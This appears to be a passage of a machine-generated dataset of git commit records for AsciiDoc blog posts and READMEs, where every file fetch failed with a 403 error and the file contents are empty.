More","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-16-Which-Smartphone-Do-They-ACTUALLY-Use--MKBHD-Austin-Evans-Linus--More.adoc","new_file":"_posts\/2018-01-16-Which-Smartphone-Do-They-ACTUALLY-Use--MKBHD-Austin-Evans-Linus--More.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4efd5a9a849d50bb687b59f7f9cf8be6fa1a4fd","subject":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","message":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e259a0e96b9105cb98c6626ddd3ae97c4742fa57","subject":"y2b create post Deal Therapy: Best Headphones Under $100, Canon T4i Kit for $648 \\u0026 More!","message":"y2b create post Deal Therapy: Best Headphones Under $100, Canon T4i Kit for $648 \\u0026 
More!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-15-Deal-Therapy-Best-Headphones-Under-100-Canon-T4i-Kit-for-648-u0026-More.adoc","new_file":"_posts\/2013-04-15-Deal-Therapy-Best-Headphones-Under-100-Canon-T4i-Kit-for-648-u0026-More.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7b1664c8049614f39b49489b8777e7b36ef8825","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"833593715dd6f62736b83503329d1e7640fa4505","subject":"Update 2015-10-12-Four-Acts-of-Citizenry.adoc","message":"Update 2015-10-12-Four-Acts-of-Citizenry.adoc","repos":"mazongo\/mazongo.github.io,mazongo\/mazongo.github.io,mazongo\/mazongo.github.io","old_file":"_posts\/2015-10-12-Four-Acts-of-Citizenry.adoc","new_file":"_posts\/2015-10-12-Four-Acts-of-Citizenry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mazongo\/mazongo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e887078f9e6977d67b05e933542ae79d876ecb4a","subject":"Hawkular Services 0.0.2.Final blog post (#181)","message":"Hawkular Services 0.0.2.Final blog post (#181)\n\n","repos":"jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/06\/14\/hawkular-services-0.0.2.Final.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/06\/14\/hawkular-services-0.0.2.Final.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"44959294bbec524db80e227bf717597ef4bbba55","subject":"Update 2015-06-28-First-Post.adoc","message":"Update 2015-06-28-First-Post.adoc","repos":"Vanell\/vanell.github.io,Vanell\/vanell.github.io,Vanell\/vanell.github.io","old_file":"_posts\/2015-06-28-First-Post.adoc","new_file":"_posts\/2015-06-28-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanell\/vanell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"191b014bae852690d5e7ede29c18fdf627aaaffc","subject":"Update 2016-08-08-2016-08-08.adoc","message":"Update 2016-08-08-2016-08-08.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-08-2016-08-08.adoc","new_file":"_posts\/2016-08-08-2016-08-08.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27b8a9d0b5e241ba6410781b3cb2d18de24cd006","subject":"Update 2017-02-11-Drawatchio.adoc","message":"Update 2017-02-11-Drawatchio.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-11-Drawatchio.adoc","new_file":"_posts\/2017-02-11-Drawatchio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b753d6dc426de76d74e4e00b52b1c2b1c667db96","subject":"Update 2017-02-17-First-Podcast-Episode.adoc","message":"Update 2017-02-17-First-Podcast-Episode.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-02-17-First-Podcast-Episode.adoc","new_file":"_posts\/2017-02-17-First-Podcast-Episode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"361f977ffd03f6c82ec44dbca07e80ef6a91b8a7","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0ede6d7a96223325dc272aff5d4cd0934492c23","subject":"Formatting changes","message":"Formatting changes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8bd64fdd4d3bcecdd6d9ac507b92e221e4a02158","subject":"Update 2016-02-26-Friday-Favorites-What-is-your-favorite-parade-in-Disney-World-or-Disneyland.adoc","message":"Update 2016-02-26-Friday-Favorites-What-is-your-favorite-parade-in-Disney-World-or-Disneyland.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-26-Friday-Favorites-What-is-your-favorite-parade-in-Disney-World-or-Disneyland.adoc","new_file":"_posts\/2016-02-26-Friday-Favorites-What-is-your-favorite-parade-in-Disney-World-or-Disneyland.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c4da61b800b4ef7d060148cc0d07e8494197f91","subject":"0.6.1 release announcement","message":"0.6.1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2017-10-26-debezium-0-6-1-released.adoc","new_file":"blog\/2017-10-26-debezium-0-6-1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8fe3d5cc352151a82d0d320b26be201d9e83273c","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"549a2a6de71c1e95b29465dfc6696b0bb8454687","subject":"y2b create post Logitech Z623 Speaker System Unboxing \\u0026 Overview","message":"y2b create post Logitech Z623 Speaker System Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-29-Logitech-Z623-Speaker-System-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-08-29-Logitech-Z623-Speaker-System-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e1c727d63bed84562b978e41e99613bc59807d0","subject":"Update 2017-01-21-Automating-your-builds-with-continuous-integration.adoc","message":"Update 
2017-01-21-Automating-your-builds-with-continuous-integration.adoc","repos":"sandersky\/sandersky.github.io,sandersky\/sandersky.github.io,sandersky\/sandersky.github.io,sandersky\/sandersky.github.io","old_file":"_posts\/2017-01-21-Automating-your-builds-with-continuous-integration.adoc","new_file":"_posts\/2017-01-21-Automating-your-builds-with-continuous-integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sandersky\/sandersky.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"baa21a94d9f063be00ea3076be76399818729746","subject":"Update 2016-07-05-Episode-63-Recommend-Tables-Like-You-Recommend-Home-Theatre-Test-Movies.adoc","message":"Update 2016-07-05-Episode-63-Recommend-Tables-Like-You-Recommend-Home-Theatre-Test-Movies.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-07-05-Episode-63-Recommend-Tables-Like-You-Recommend-Home-Theatre-Test-Movies.adoc","new_file":"_posts\/2016-07-05-Episode-63-Recommend-Tables-Like-You-Recommend-Home-Theatre-Test-Movies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8be9cc9898248a69496cbc92bebcfffbfba6dda6","subject":"updated requirements for attendees","message":"updated requirements for attendees\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55bfa4d9d7c97d140a3ee6c0e0e681d4b552c8d5","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96891b8ba5751ee7668d4f6c184b01ded153b7db","subject":"Update 2015-04-29-Understanding-latency-and-application-responsiveness.adoc","message":"Update 2015-04-29-Understanding-latency-and-application-responsiveness.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2015-04-29-Understanding-latency-and-application-responsiveness.adoc","new_file":"_posts\/2015-04-29-Understanding-latency-and-application-responsiveness.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"1ca68c8b411e2c593ce03fbcc30b038d7dd662d0","subject":"Change title","message":"Change title\n","repos":"hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hwolf\/oauth2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"929a272aa3c3575386d553f967e8e44580885103","subject":"picture","message":"picture\n","repos":"xbib\/catalog-entities","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xbib\/catalog-entities.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dad68ee1c27ba9f2541bebe0afd6897b5a016be9","subject":"Changed formatting","message":"Changed formatting","repos":"prateepb\/spiracle,prateepb\/spiracle,waratek\/spiracle,waratek\/spiracle,waratek\/spiracle,prateepb\/spiracle","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateepb\/spiracle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0d8da0850a53ed77e9ab848669224c3333c31635","subject":"README: update eclipse information","message":"README: update eclipse information\n\nMostly due to C++11 nonsense. But after playing with the exclusion list some\nmore, I now have an indexed Kudu tree with the fewest false positives (i.e.\nmisplaced \"red squigglies\") I've seen yet.\n\nChange-Id: I3f4fe4b64ddb57ceaa3daf6121b643c4ce12ee4b\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1839\nTested-by: Internal Jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"29b1430d942752d99b5e3af1560a753d1295737a","subject":"Update README","message":"Update README\n","repos":"pjanouch\/sensei-raw-ctl","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/sensei-raw-ctl.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"6553bdfb9256cbcde29e91ca229e858f1415e4b6","subject":"y2b create post Mysterious Watch Dogs event + Unbox Therapy on the news!","message":"y2b create post Mysterious Watch Dogs event + Unbox Therapy on the 
news!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-04-02-Mysterious-Watch-Dogs-event--Unbox-Therapy-on-the-news.adoc","new_file":"_posts\/2014-04-02-Mysterious-Watch-Dogs-event--Unbox-Therapy-on-the-news.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1eedbf417b919450458db921a9722a9c09dc66f0","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b63073bcbbabbfb24994fe90f4f3d9bd2d35e745","subject":"Update 2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc","message":"Update 2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc","repos":"ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com","old_file":"_posts\/2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc","new_file":"_posts\/2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahopkins\/amhopkins.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b79410af97ab8a4fd5ce2b470b8ee94cdf40c6b","subject":"y2b create post The $12 Smart Watch - Does It Suck?","message":"y2b create post The $12 Smart Watch - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-07-The%20%2412%20Smart%20Watch%20-%20Does%20It%20Suck%3F.adoc","new_file":"_posts\/2017-12-07-The%20%2412%20Smart%20Watch%20-%20Does%20It%20Suck%3F.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66105d5cf5e5d4f59361724d688e5c55c8ff28a4","subject":"Create do-code-of-conduct-es.adoc","message":"Create do-code-of-conduct-es.adoc\n\nSpanish translation for do-code-of-conduct.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-code-of-conduct-es.adoc","new_file":"src\/do\/do-code-of-conduct-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da4789298f55a02bee9317010fe991c0f759abea","subject":"Update 2016-31-10-Side-Effects-and-How-To-Deal-With-Them-The-Cool-Way-Part-2-Monads-Introduction.adoc","message":"Update 
2016-31-10-Side-Effects-and-How-To-Deal-With-Them-The-Cool-Way-Part-2-Monads-Introduction.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-31-10-Side-Effects-and-How-To-Deal-With-Them-The-Cool-Way-Part-2-Monads-Introduction.adoc","new_file":"_posts\/2016-31-10-Side-Effects-and-How-To-Deal-With-Them-The-Cool-Way-Part-2-Monads-Introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12dfc11953ef24bf33c3a0a64178873cd5ec027d","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b24c7ecaae01514b22a5e4b22bec11dd92b6c165","subject":"Outgoing requests guide v1 (#9866)","message":"Outgoing requests guide v1 (#9866)\n\n* Outgoing requests guide v1\r\n\r\nCloses #9773\r\n\r\n* Apply suggestions from code review\r\n\r\nCo-authored-by: Stian Thorgersen <a6ddd297d429c9579f4f15b67db113381b3899b4@redhat.com>\r\n\r\nCo-authored-by: Stian Thorgersen <a6ddd297d429c9579f4f15b67db113381b3899b4@redhat.com>","repos":"ahus1\/keycloak,ahus1\/keycloak,ahus1\/keycloak,jpkrohling\/keycloak,stianst\/keycloak,reneploetz\/keycloak,raehalme\/keycloak,stianst\/keycloak,abstractj\/keycloak,srose\/keycloak,hmlnarik\/keycloak,hmlnarik\/keycloak,jpkrohling\/keycloak,jpkrohling\/keycloak,reneploetz\/keycloak,mhajas\/keycloak,jpkrohling\/keycloak,keycloak\/keycloak,srose\/keycloak,raehalme\/keycloak,mhajas\/keycloak,hmlnarik\/keycloak,hmlnarik\/keycloak,raehalme\/keycloak,mhajas\/keycloak,reneploetz\/keycloak,srose\/keycloak,abstractj\/keycloak,abstractj\/keycloak,mhajas\/keycloak,reneploetz\/keycloak,reneploetz\/keycloak,ahus1\/keycloak,thomasdarimont\/keycloak,mhajas\/keycloak,hmlnarik\/keycloak,hmlnarik\/keycloak,stianst\/keycloak,srose\/keycloak,abstractj\/keycloak,keycloak\/keycloak,thomasdarimont\/keycloak,keycloak\/keycloak,keycloak\/keycloak,raehalme\/keycloak,ahus1\/keycloak,keycloak\/keycloak,stianst\/keycloak,thomasdarimont\/keycloak,raehalme\/keycloak,thomasdarimont\/keycloak,raehalme\/keycloak,stianst\/keycloak,ahus1\/keycloak,jpkrohling\/keycloak,thomasdarimont\/keycloak,thomasdarimont\/keycloak,srose\/keycloak,abstractj\/keycloak","old_file":"docs\/guides\/src\/main\/server\/outgoinghttp.adoc","new_file":"docs\/guides\/src\/main\/server\/outgoinghttp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahus1\/keycloak.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d580cb7249bc3b4a27b8b8b6e2c5e3e78c9d00b2","subject":"Note ganglia registry's dependency's licensing","message":"Note ganglia registry's dependency's licensing\n\nSee 
#1354\n","repos":"micrometer-metrics\/micrometer,micrometer-metrics\/micrometer,micrometer-metrics\/micrometer","old_file":"implementations\/micrometer-registry-ganglia\/README.adoc","new_file":"implementations\/micrometer-registry-ganglia\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/micrometer-metrics\/micrometer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3ae541430fac2dd9f634ff1afa533a64f21777fb","subject":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e5f25055b9a2216804fbf3735b31535f2ab6395","subject":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f116d33aa193779be1cb93e41ccddd82d99eab63","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b492d9bed527f31856850bb1018f51fbccb1d02","subject":"doc: users: fix TM typos","message":"doc: users: fix TM typos\n\nSuggested-by: Anders Roxell <b4e8e89057bc64bc4f9625a4a821c9ac177a7ed2@linaro.org>\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov 
